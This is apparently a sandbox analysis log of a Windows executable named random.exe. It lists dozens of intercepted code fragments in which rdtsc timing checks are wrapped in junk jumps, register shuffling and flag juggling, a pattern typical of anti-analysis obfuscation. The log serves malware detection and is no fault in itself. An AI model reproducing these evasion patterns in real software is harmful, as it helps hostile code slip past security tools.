Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 57307EF second address: 57308BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E56389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8D38E56381h 0x0000000f xchg eax, ecx 0x00000010 jmp 00007F8D38E5637Eh 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 movzx ecx, bx 0x0000001a mov dx, B1EEh 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F8D38E5637Eh 0x00000027 sbb eax, 53EB4A38h 0x0000002d jmp 00007F8D38E5637Bh 0x00000032 popfd 0x00000033 popad 0x00000034 xchg eax, esi 0x00000035 jmp 00007F8D38E56386h 0x0000003a lea eax, dword ptr [ebp-04h] 0x0000003d jmp 00007F8D38E56380h 0x00000042 nop 0x00000043 jmp 00007F8D38E56380h 0x00000048 push eax 0x00000049 jmp 00007F8D38E5637Bh 0x0000004e nop 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F8D38E56385h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 57308BA second address: 57308CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D38B7BC8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730918 second address: 573096E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E5637Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b pushad 0x0000000c mov esi, 7E4855DBh 0x00000011 mov edx, eax 0x00000013 popad 0x00000014 je 00007F8D38E563E2h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F8D38E5637Fh 0x00000023 xor eax, 6CB7683Eh 0x00000029 jmp 00007F8D38E56389h 0x0000002e popfd 0x0000002f push eax 0x00000030 pop edx 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730991 second address: 5730996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730996 second address: 57309BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E5637Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F8D38E5637Dh 0x00000013 pop esi 0x00000014 mov dx, 1774h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 57309BC second address: 57309E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007F8D38B7BC90h 0x0000000f leave 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 57309E2 second address: 57309E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 57309E6 second address: 57309EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 57309EA second address: 57309F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 57309F0 second address: 57309F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 57309F6 second address: 57309FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 57309FA second address: 5720013 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c sub esp, 04h 0x0000000f xor ebx, ebx 0x00000011 cmp eax, 00000000h 0x00000014 je 00007F8D38B7BE05h 0x0000001a mov dword ptr [esp], 0000000Dh 0x00000021 call 00007F8D3D4A2C31h 0x00000026 mov edi, edi 0x00000028 pushad 0x00000029 push eax 0x0000002a movsx edi, cx 0x0000002d pop ecx 0x0000002e mov ax, dx 0x00000031 popad 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720013 second address: 5720017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720017 second address: 572001B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 572001B second address: 5720021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720021 second address: 5720074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d call 00007F8D38B7BC8Eh 0x00000012 mov bx, ax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007F8D38B7BC8Dh 0x0000001e add si, 0856h 0x00000023 jmp 00007F8D38B7BC91h 0x00000028 popfd 0x00000029 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720074 second address: 57200A2 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8D38E56380h 0x00000008 sbb cl, 00000078h 0x0000000b jmp 00007F8D38E5637Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 mov si, 4CC1h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 57200A2 second address: 57200A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 57200A6 second address: 572013C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 sub esp, 2Ch 0x0000000a pushad 0x0000000b mov ebx, 758EE44Ah 0x00000010 pushfd 0x00000011 jmp 00007F8D38E5637Bh 0x00000016 sbb esi, 7F9256EEh 0x0000001c jmp 00007F8D38E56389h 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, ebx 0x00000024 pushad 0x00000025 mov di, si 0x00000028 pushfd 0x00000029 jmp 00007F8D38E56388h 0x0000002e sbb al, FFFFFF98h 0x00000031 jmp 00007F8D38E5637Bh 0x00000036 popfd 0x00000037 popad 0x00000038 push eax 0x00000039 jmp 00007F8D38E56389h 0x0000003e xchg eax, ebx 0x0000003f pushad 0x00000040 mov esi, 500826D3h 0x00000045 mov edi, ecx 0x00000047 popad 0x00000048 xchg eax, edi 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 572013C second address: 5720140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720140 second address: 5720146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720146 second address: 572015F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D38B7BC95h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 572015F second address: 5720197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov dl, ah 0x0000000c pushfd 0x0000000d jmp 00007F8D38E5637Fh 0x00000012 jmp 00007F8D38E56383h 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720197 second address: 572019B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 572019B second address: 57201A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 57201A1 second address: 57201A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 572022B second address: 5720258 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E56389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8D38E5637Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720258 second address: 572025E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 572025E second address: 5720290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E56383h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8D38E56385h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720290 second address: 5720296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720296 second address: 572029A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 572029A second address: 57202CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F8D38B7BE67h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F8D38B7BC8Eh 0x00000017 xor esi, 7139EAE8h 0x0000001d jmp 00007F8D38B7BC8Bh 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 57202CC second address: 57202F7 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 62DFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c jmp 00007F8D38E56382h 0x00000011 mov dword ptr [ebp-14h], edi 0x00000014 pushad 0x00000015 mov esi, 7D3F311Dh 0x0000001a push eax 0x0000001b push edx 0x0000001c mov ah, BCh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720373 second address: 5720382 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720382 second address: 5720415 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8D38E5637Fh 0x00000008 mov ebx, esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test eax, eax 0x0000000f jmp 00007F8D38E56382h 0x00000014 jg 00007F8DA9354455h 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F8D38E5637Dh 0x00000021 sbb eax, 0032F146h 0x00000027 jmp 00007F8D38E56381h 0x0000002c popfd 0x0000002d popad 0x0000002e js 00007F8D38E5641Eh 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov si, bx 0x0000003a pushfd 0x0000003b jmp 00007F8D38E5637Fh 0x00000040 adc cl, 0000007Eh 0x00000043 jmp 00007F8D38E56389h 0x00000048 popfd 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720415 second address: 5720470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, AA92h 0x00000007 mov cl, bl 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c cmp dword ptr [ebp-14h], edi 0x0000000f pushad 0x00000010 mov ebx, eax 0x00000012 call 00007F8D38B7BC8Ch 0x00000017 jmp 00007F8D38B7BC92h 0x0000001c pop ecx 0x0000001d popad 0x0000001e jne 00007F8DA9079CDAh 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F8D38B7BC8Ah 0x0000002d sub ch, 00000008h 0x00000030 jmp 00007F8D38B7BC8Bh 0x00000035 popfd 0x00000036 mov ecx, 74344F7Fh 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720470 second address: 57204C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E56385h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop esi 0x00000011 pushfd 0x00000012 jmp 00007F8D38E5637Fh 0x00000017 add ecx, 3CB9A2AEh 0x0000001d jmp 00007F8D38E56389h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 57204C2 second address: 57204D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D38B7BC8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 57204D2 second address: 57204D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 57204D6 second address: 5720516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-2Ch] 0x0000000b pushad 0x0000000c mov edi, 3417A840h 0x00000011 mov edi, 79EF086Ch 0x00000016 popad 0x00000017 push esi 0x00000018 pushad 0x00000019 jmp 00007F8D38B7BC8Eh 0x0000001e mov ebx, esi 0x00000020 popad 0x00000021 mov dword ptr [esp], esi 0x00000024 jmp 00007F8D38B7BC8Ch 0x00000029 nop 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720516 second address: 572051A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 572051A second address: 5720537 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720537 second address: 572053D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 572053D second address: 5720541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720541 second address: 5720561 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8D38E56385h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720561 second address: 5720571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D38B7BC8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5710CBC second address: 5710D05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8D38E5637Ah 0x00000008 mov di, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov edi, esi 0x00000014 mov di, cx 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a jmp 00007F8D38E56380h 0x0000001f xchg eax, ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F8D38E56387h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5710D05 second address: 5710D2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8D38B7BC8Fh 0x00000009 jmp 00007F8D38B7BC93h 0x0000000e popfd 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5710D2E second address: 5710D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 mov ebx, 61CC46A8h 0x0000000e pushfd 0x0000000f jmp 00007F8D38E56381h 0x00000014 xor eax, 153FB016h 0x0000001a jmp 00007F8D38E56381h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F8D38E5637Dh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5710D77 second address: 5710D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D38B7BC8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5710D87 second address: 5710D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720A15 second address: 5720A55 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 9A2Ah 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ax, dx 0x0000000e mov di, 26CEh 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 jmp 00007F8D38B7BC95h 0x0000001a cmp dword ptr [75C7459Ch], 05h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F8D38B7BC8Dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720B5F second address: 5720B92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E56389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ebx, 451A0D32h 0x00000010 mov bh, CAh 0x00000012 popad 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov dh, ah 0x0000001c mov dh, CFh 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720B92 second address: 5720BF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F8D38B7BC91h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F8D38B7BC93h 0x0000001b jmp 00007F8D38B7BC93h 0x00000020 popfd 0x00000021 popad 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushad 0x00000027 popad 0x00000028 mov cl, dh 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720BF5 second address: 5720C70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 7683617Ch 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d call 00007F8DA934B2E6h 0x00000012 push 75C12B70h 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov eax, dword ptr [esp+10h] 0x00000022 mov dword ptr [esp+10h], ebp 0x00000026 lea ebp, dword ptr [esp+10h] 0x0000002a sub esp, eax 0x0000002c push ebx 0x0000002d push esi 0x0000002e push edi 0x0000002f mov eax, dword ptr [75C74538h] 0x00000034 xor dword ptr [ebp-04h], eax 0x00000037 xor eax, ebp 0x00000039 push eax 0x0000003a mov dword ptr [ebp-18h], esp 0x0000003d push dword ptr [ebp-08h] 0x00000040 mov eax, dword ptr [ebp-04h] 0x00000043 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000004a mov dword ptr [ebp-08h], eax 0x0000004d lea eax, dword ptr [ebp-10h] 0x00000050 mov dword ptr fs:[00000000h], eax 0x00000056 ret 0x00000057 pushad 0x00000058 pushfd 0x00000059 jmp 00007F8D38E56387h 0x0000005e and ax, A4AEh 0x00000063 jmp 00007F8D38E56389h 0x00000068 popfd 0x00000069 mov ah, C5h 0x0000006b popad 0x0000006c mov esi, 00000000h 0x00000071 jmp 00007F8D38E56388h 0x00000076 mov dword ptr [ebp-1Ch], esi 0x00000079 push eax 0x0000007a push edx 0x0000007b push eax 0x0000007c push edx 0x0000007d jmp 00007F8D38E5637Ah 0x00000082 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720C70 second address: 5720C7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720CCF second address: 5720CD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720CD5 second address: 5720D1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a pushad 0x0000000b mov dx, cx 0x0000000e popad 0x0000000f je 00007F8DA905F927h 0x00000015 pushad 0x00000016 jmp 00007F8D38B7BC90h 0x0000001b jmp 00007F8D38B7BC92h 0x00000020 popad 0x00000021 cmp dword ptr [ebp+08h], 00002000h 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5720D1A second address: 5720D23 instructions: 0x00000000 rdtsc 0x00000002 mov ch, 67h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730A3B second address: 5730A64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 3646F87Eh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esp 0x0000000e pushad 0x0000000f jmp 00007F8D38B7BC8Eh 0x00000014 mov bl, ch 0x00000016 popad 0x00000017 mov dword ptr [esp], ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730A64 second address: 5730A6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730A6A second address: 5730ADE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007F8D38B7BC8Ch 0x00000011 mov ecx, 548A1D31h 0x00000016 pop eax 0x00000017 mov dl, 53h 0x00000019 popad 0x0000001a xchg eax, esi 0x0000001b jmp 00007F8D38B7BC96h 0x00000020 push eax 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F8D38B7BC91h 0x00000028 sub ecx, 13858026h 0x0000002e jmp 00007F8D38B7BC91h 0x00000033 popfd 0x00000034 push eax 0x00000035 push edx 0x00000036 mov edx, ecx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730ADE second address: 5730B6B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8D38E5637Ah 0x00000008 xor ecx, 0C54A9C8h 0x0000000e jmp 00007F8D38E5637Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, esi 0x00000018 pushad 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F8D38E56382h 0x00000020 or cx, AC28h 0x00000025 jmp 00007F8D38E5637Bh 0x0000002a popfd 0x0000002b push esi 0x0000002c pop edx 0x0000002d popad 0x0000002e jmp 00007F8D38E56384h 0x00000033 popad 0x00000034 mov esi, dword ptr [ebp+0Ch] 0x00000037 pushad 0x00000038 jmp 00007F8D38E5637Eh 0x0000003d mov edx, esi 0x0000003f popad 0x00000040 test esi, esi 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F8D38E56383h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730B6B second address: 5730BF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov edi, 684BE456h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007F8DA90594C5h 0x00000013 jmp 00007F8D38B7BC8Dh 0x00000018 cmp dword ptr [75C7459Ch], 05h 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F8D38B7BC8Ch 0x00000026 or ax, 9E78h 0x0000002b jmp 00007F8D38B7BC8Bh 0x00000030 popfd 0x00000031 push esi 0x00000032 pushfd 0x00000033 jmp 00007F8D38B7BC8Fh 0x00000038 xor eax, 75A53E3Eh 0x0000003e jmp 00007F8D38B7BC99h 0x00000043 popfd 0x00000044 pop eax 0x00000045 popad 0x00000046 je 00007F8DA9071539h 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f mov si, CE7Fh 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730BF2 second address: 5730C50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E56380h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov bx, cx 0x0000000e pushfd 0x0000000f jmp 00007F8D38E5637Ah 0x00000014 and eax, 034DFD98h 0x0000001a jmp 00007F8D38E5637Bh 0x0000001f popfd 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 mov edi, 38F746BAh 0x00000028 movsx ebx, si 0x0000002b popad 0x0000002c xchg eax, esi 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F8D38E56389h 0x00000034 rdtsc
